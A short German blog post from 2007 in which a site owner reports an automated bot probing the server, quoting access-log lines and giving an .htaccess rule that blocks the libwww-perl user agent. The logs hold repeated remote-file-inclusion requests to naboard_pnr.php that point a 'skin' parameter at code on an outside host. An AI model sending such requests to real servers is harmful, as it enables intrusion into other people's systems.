Es scheint wirklich groß in Mode zu sein, mit automatisierten Skripts Schwachstellen auf Webservern zu suchen. Falls hier bald nichts mehr antwortet, dann hat das was hiermit zu tun

:
2007-04-19 22:27 unknown libwww-perl/5.65 nwns0001.nwwnet.net
2007-04-19 22:27 unknown libwww-perl/5.79 222.236.47.187
2007-04-19 22:27 unknown libwww-perl/5.803 203.85.114.102
2007-04-19 22:26 unknown libwww-perl/5.79 flex2532-001.flexservers. com
2007-04-19 22:26 unknown libwww-perl/5.805 psts.net.ua
2007-04-19 22:26 unknown libwww-perl/5.79 222.236.47.187
2007-04-19 22:25 unknown libwww-perl/5.79 flex2532-001.flexservers. com
2007-04-19 22:25 unknown libwww-perl/5.65 nwns0001.nwwnet.net
2007-04-19 22:25 unknown libwww-perl/5.65 ns3.rosehosting.com
2007-04-19 22:25 unknown libwww-perl/5.79 59-125-93-22.HINET-IP.hin et.net
2007-04-19 22:25 unknown libwww-perl/5.805 smile.vanleuven.com
2007-04-19 22:24 unknown libwww-perl/5.65 nwns0001.nwwnet.net
65.123.73.11 - - [19/Apr/2007:22:24:59 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163485 "-" "libwww-perl/5.65"
217.78.242.26 - - [19/Apr/2007:22:25:00 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163863 "-" "libwww-perl/5.805"
59.125.93.22 - - [19/Apr/2007:22:25:07 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163485 "-" "libwww-perl/5.79"
209.135.140.145 - - [19/Apr/2007:22:25:18 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163499 "-" "libwww-perl/5.65"
65.123.73.11 - - [19/Apr/2007:22:25:19 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163491 "-" "libwww-perl/5.65"
89.255.3.4 - - [19/Apr/2007:22:25:51 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163492 "-" "libwww-perl/5.79"
222.236.47.187 - - [19/Apr/2007:22:26:03 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163576 "-" "libwww-perl/5.79"
Da probiert gerade ein Bot hier auf dem Server Schwachstellen zu finden.
siehe hier
Update: Jemand hat danach gesucht wie man den User-Agent libwww-perl aussperren kann:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ - [F]
in die .htaccess eintragen.